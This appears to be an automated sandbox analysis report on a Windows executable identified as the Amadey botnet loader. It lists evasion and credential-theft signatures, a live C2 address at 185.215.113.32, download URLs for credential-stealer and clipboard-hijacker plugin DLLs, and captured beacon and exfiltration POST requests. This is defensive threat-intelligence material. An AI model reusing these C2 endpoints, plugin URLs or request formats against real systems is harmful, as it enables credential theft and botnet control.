Windows Analysis Report
wIaKimJFke.exe

Overview

General Information

Sample name: wIaKimJFke.exe
renamed because original name is a hash value
Original sample name: 79fbd35cae4148d9053cd4590b6d41c0.exe
Analysis ID: 1417243
MD5: 79fbd35cae4148d9053cd4590b6d41c0
SHA1: 3548d8fa1f242206447224068c16ffd30278ede3
SHA256: 9c1751ba73fe53ed9385f24750212c6e785843e4c63dbafec8f95d3e6a5088ef
Tags: exe

Detection

Amadey
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Capture Wi-Fi password
Snort IDS alert for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected Amadeys Clipper DLL
Yara detected Amadeys stealer DLL
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Hides threads from debuggers
Machine Learning detection for dropped file
Machine Learning detection for sample
PE file contains section with special chars
Potentially malicious time measurement code found
Sample uses string decryption to hide its real strings
Sigma detected: Suspicious Script Execution From Temp Folder
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal WLAN passwords
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Instant Messenger accounts or passwords
Uses netsh to modify the Windows network and firewall settings
Abnormally high CPU usage
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for reading data from the clipboard
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates job files (autostart)
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Folder Compress To Potentially Suspicious Output Via Compress-Archive Cmdlet
Tries to load missing DLLs
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Name: Amadey
Description: Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.
Attribution: No Attribution
Blogpost URLs: (none listed)
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey

AV Detection

Source: wIaKimJFke.exe Avira: detected
Source: http://pesterbdd.com/images/Pester.png URL Reputation: Label: malware
Source: http://185.215.113.32/yandex/index.php% Avira URL Cloud: Label: malware
Source: http://185.215.113.32/yandex/index.phprsion Avira URL Cloud: Label: malware
Source: http://185.215.113.32/yandex/index.phpK Avira URL Cloud: Label: malware
Source: http://185.215.113.32/yandex/Plugins/clip64.dll1 Avira URL Cloud: Label: malware
Source: http://185.215.113.32/yandex/index.phpg Avira URL Cloud: Label: malware
Source: http://185.215.113.32/yandex/index.phpVl Avira URL Cloud: Label: malware
Source: http://185.215.113.32/yandex/index.php2ab05 Avira URL Cloud: Label: malware
Source: http://185.215.113.32/yandex/index.phpa Avira URL Cloud: Label: malware
Source: http://185.215.113.32/yandex/index.php:10 Avira URL Cloud: Label: malware
Source: http://185.215.113.32/yandex/Plugins/clip64.dll& Avira URL Cloud: Label: malware
Source: http://185.215.113.32/yandex/index.php Avira URL Cloud: Label: malware
Source: http://185.215.113.32/ws Avira URL Cloud: Label: malware
Source: http://185.215.113.32/yandex/index.phpa2ab05 Avira URL Cloud: Label: malware
Source: http://185.215.113.32/yandex/Plugins/cred64.dll Avira URL Cloud: Label: malware
Source: http://185.215.113.32/yandex/index.phpWindows Avira URL Cloud: Label: malware
Source: http://185.215.113.32/yandex/index.php?wal=1r Avira URL Cloud: Label: malware
Source: http://185.215.113.32/ Avira URL Cloud: Label: malware
Source: http://185.215.113.32/yandex/index.php?wal=1tesf Avira URL Cloud: Label: malware
Source: http://185.215.113.32/yandex/Plugins/clip64.dll Avira URL Cloud: Label: malware
Source: http://185.215.113.32/yandex/index.phpn Avira URL Cloud: Label: malware
Source: http://185.215.113.32/yandex/index.phpp Avira URL Cloud: Label: malware
Source: http://185.215.113.32/yandex/index.php?wal=1& Avira URL Cloud: Label: malware
Source: http://185.215.113.32/yandex/index.phpa0 Avira URL Cloud: Label: malware
Source: http://185.215.113.32/yandex/index.php?wal=1 Avira URL Cloud: Label: malware
Source: http://185.215.113.32/yandex/Plugins/cred64.dll2 Avira URL Cloud: Label: malware
Source: http://185.215.113.32/yandex/index.phpx Avira URL Cloud: Label: malware
Source: http://185.215.113.32/yandex/index.phpu Avira URL Cloud: Label: malware
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\clip64[1].dll Avira: detection malicious, Label: TR/ClipBanker.rtyrx
Source: C:\Users\user\AppData\Roaming\006700e5a2ab05\cred64.dll Avira: detection malicious, Label: TR/PSW.Agent.szlsq
Source: C:\Users\user\AppData\Roaming\006700e5a2ab05\clip64.dll Avira: detection malicious, Label: TR/ClipBanker.rtyrx
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\cred64[1].dll Avira: detection malicious, Label: TR/PSW.Agent.szlsq
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: 10.2.rundll32.exe.6e220000.0.unpack Malware Configuration Extractor: Amadey {"C2 url": ["185.215.113.32/yandex/index.php"]}
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\cred64[1].dll ReversingLabs: Detection: 70%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\clip64[1].dll ReversingLabs: Detection: 91%
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe ReversingLabs: Detection: 71%
Source: C:\Users\user\AppData\Roaming\006700e5a2ab05\clip64.dll ReversingLabs: Detection: 91%
Source: C:\Users\user\AppData\Roaming\006700e5a2ab05\cred64.dll ReversingLabs: Detection: 70%
Source: wIaKimJFke.exe ReversingLabs: Detection: 71%
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe Joe Sandbox ML: detected
Source: wIaKimJFke.exe Joe Sandbox ML: detected
Source: 10.2.rundll32.exe.6e220000.0.unpack String decryptor: 185.215.113.32
Source: 10.2.rundll32.exe.6e220000.0.unpack String decryptor: /yandex/index.php
Source: wIaKimJFke.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: Binary string: D:\Mktmp\StealerDLL\x64\Release\STEALERDLL.pdb source: cred64.dll.5.dr, cred64[1].dll.5.dr
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_6E22BA2F FindFirstFileExW,_free,FindNextFileW,_free,FindClose,_free, 10_2_6E22BA2F
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\OneDrive\desktop.ini
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\Videos\desktop.ini
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\Music\desktop.ini

Networking

Source: Traffic Snort IDS: 2856147 ETPRO TROJAN Amadey CnC Activity M3 192.168.2.4:49737 -> 185.215.113.32:80
Source: Traffic Snort IDS: 2855239 ETPRO TROJAN Win32/Amadey Stealer Activity M4 (POST) 192.168.2.4:49743 -> 185.215.113.32:80
Source: Traffic Snort IDS: 2856151 ETPRO TROJAN Amadey CnC Activity M7 192.168.2.4:49745 -> 185.215.113.32:80
Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 185.215.113.32 80
Source: Malware configuration extractor IPs: 185.215.113.32
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 28 Mar 2024 19:03:03 GMTContent-Type: application/octet-streamContent-Length: 1285632Last-Modified: Sun, 04 Feb 2024 16:00:19 GMTConnection: keep-aliveETag: "65bfb493-139e00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c6 de c9 0d 82 bf a7 5e 82 bf a7 5e 82 bf a7 5e d9 d7 a3 5f 91 bf a7 5e d9 d7 a4 5f 92 bf a7 5e d9 d7 a2 5f 32 bf a7 5e 57 d2 a2 5f c4 bf a7 5e 57 d2 a3 5f 8d bf a7 5e 57 d2 a4 5f 8b bf a7 5e d9 d7 a6 5f 8f bf a7 5e 82 bf a6 5e 43 bf a7 5e 19 d1 ae 5f 86 bf a7 5e 19 d1 a7 5f 83 bf a7 5e 19 d1 58 5e 83 bf a7 5e 19 d1 a5 5f 83 bf a7 5e 52 69 63 68 82 bf a7 5e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 64 86 07 00 83 b2 bf 65 00 00 00 00 00 00 00 00 f0 00 22 20 0b 02 0e 18 00 c0 0f 00 00 52 04 00 00 00 00 00 68 06 0d 00 00 10 00 00 00 00 00 80 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 50 14 00 00 04 00 00 00 00 00 00 02 00 60 01 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 20 89 12 00 58 00 00 00 78 89 12 00 8c 00 00 00 00 20 14 00 f8 00 00 00 00 60 13 00 28 ad 00 00 00 00 00 00 00 00 00 00 00 30 14 00 f4 15 00 00 b0 9e 11 00 70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 9f 11 00 08 01 00 00 00 00 00 00 00 00 00 00 00 d0 0f 00 e8 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f8 be 0f 00 00 10 00 00 00 c0 0f 00 00 04 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 e2 cd 02 00 00 d0 0f 00 00 ce 02 00 00 c4 0f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 4c bb 00 00 00 a0 12 00 00 44 00 00 00 92 12 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 28 ad 00 00 00 60 13 00 00 ae 00 00 00 d6 12 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 5f 52 44 41 54 41 00 00 94 00 00 00 00 10 14 00 00 02 00 00 00 84 13 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 f8 00 00 00 00 20 14 00 00 02 00 00 00 86 13 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f4 15 00 00 00 30 14 00 00 16 00 00 00 88 13 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 28 Mar 2024 19:03:06 GMTContent-Type: application/octet-streamContent-Length: 112128Last-Modified: Sun, 04 Feb 2024 16:00:18 GMTConnection: keep-aliveETag: "65bfb492-1b600"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 27 f6 04 b3 63 97 6a e0 63 97 6a e0 63 97 6a e0 38 ff 69 e1 69 97 6a e0 38 ff 6f e1 eb 97 6a e0 38 ff 6e e1 71 97 6a e0 b6 fa 6e e1 6c 97 6a e0 b6 fa 69 e1 72 97 6a e0 b6 fa 6f e1 42 97 6a e0 38 ff 6b e1 64 97 6a e0 63 97 6b e0 02 97 6a e0 f8 f9 63 e1 60 97 6a e0 f8 f9 6a e1 62 97 6a e0 f8 f9 95 e0 62 97 6a e0 f8 f9 68 e1 62 97 6a e0 52 69 63 68 63 97 6a e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 85 b2 bf 65 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0e 18 00 24 01 00 00 9a 00 00 00 00 00 00 4c 66 00 00 00 10 00 00 00 40 01 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 00 02 00 00 04 00 00 00 00 00 00 02 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 20 a0 01 00 9c 00 00 00 bc a0 01 00 50 00 00 00 00 d0 01 00 f8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 01 00 bc 14 00 00 f0 8e 01 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 8f 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 40 01 00 4c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 96 22 01 00 00 10 00 00 00 24 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 
61 00 00 34 68 00 00 00 40 01 00 00 6a 00 00 00 28 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 1c 17 00 00 00 b0 01 00 00 0c 00 00 00 92 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f8 00 00 00 00 d0 01 00 00 02 00 00 00 9e 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 bc 14 00 00 00 e0 01 00 00 16 00 00 00 a0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: POST /yandex/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.32Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: GET /yandex/Plugins/cred64.dll HTTP/1.1Host: 185.215.113.32
Source: global traffic HTTP traffic detected: POST /yandex/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.32Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 39 38 36 42 34 45 46 41 38 42 36 39 44 32 37 39 31 34 32 34 41 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 37 37 37 42 32 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58986B4EFA8B69D2791424AB140BE1D46450FC9DDF642E3BDD70A7FB02777B25E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /yandex/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.32Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /yandex/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.32Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 39 38 36 42 34 45 46 41 38 42 36 39 44 32 37 39 31 34 32 34 41 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 37 37 37 42 32 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58986B4EFA8B69D2791424AB140BE1D46450FC9DDF642E3BDD70A7FB02777B25E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /yandex/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.32Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /yandex/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.32Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 39 38 36 42 34 45 46 41 38 42 36 39 44 32 37 39 31 34 32 34 41 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 37 37 37 42 32 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58986B4EFA8B69D2791424AB140BE1D46450FC9DDF642E3BDD70A7FB02777B25E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /yandex/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.32Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /yandex/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.32Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 39 38 36 42 34 45 46 41 38 42 36 39 44 32 37 39 31 34 32 34 41 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 37 37 37 42 32 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58986B4EFA8B69D2791424AB140BE1D46450FC9DDF642E3BDD70A7FB02777B25E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: GET /yandex/Plugins/clip64.dll HTTP/1.1Host: 185.215.113.32
Source: global traffic HTTP traffic detected: POST /yandex/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.32Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /yandex/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.32Content-Length: 21Cache-Control: no-cacheData Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 63 72 65 64 3d Data Ascii: id=246122658369&cred=
Source: global traffic HTTP traffic detected: POST /yandex/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.32Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 39 38 36 42 34 45 46 41 38 42 36 39 44 32 37 39 31 34 32 34 41 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 37 37 37 42 32 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58986B4EFA8B69D2791424AB140BE1D46450FC9DDF642E3BDD70A7FB02777B25E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /yandex/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.32Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /yandex/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.32Content-Length: 5Cache-Control: no-cacheData Raw: 77 6c 74 3d 31 Data Ascii: wlt=1
Source: global traffic HTTP traffic detected: POST /yandex/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.32Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 39 38 36 42 34 45 46 41 38 42 36 39 44 32 37 39 31 34 32 34 41 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 37 37 37 42 32 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58986B4EFA8B69D2791424AB140BE1D46450FC9DDF642E3BDD70A7FB02777B25E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /yandex/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.32Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /yandex/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.32Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 39 38 36 42 34 45 46 41 38 42 36 39 44 32 37 39 31 34 32 34 41 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 37 37 37 42 32 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58986B4EFA8B69D2791424AB140BE1D46450FC9DDF642E3BDD70A7FB02777B25E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /yandex/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.32Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /yandex/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.32Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 39 38 36 42 34 45 46 41 38 42 36 39 44 32 37 39 31 34 32 34 41 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 37 37 37 42 32 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58986B4EFA8B69D2791424AB140BE1D46450FC9DDF642E3BDD70A7FB02777B25E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /yandex/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.32Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /yandex/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.32Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 39 38 36 42 34 45 46 41 38 42 36 39 44 32 37 39 31 34 32 34 41 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 37 37 37 42 32 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58986B4EFA8B69D2791424AB140BE1D46450FC9DDF642E3BDD70A7FB02777B25E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /yandex/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.32Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
